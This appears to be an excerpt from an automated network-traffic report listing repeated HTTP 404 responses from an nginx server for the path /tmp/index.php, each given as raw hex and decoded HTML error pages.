      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 08:02:39 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 08:02:40 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 08:02:42 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 08:02:45 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 08:02:45 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 08:02:47 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 08:02:48 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 08:02:49 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 08:02:50 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 08:02:51 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 08:02:53 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 08:02:54 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 08:02:56 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 08:02:56 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
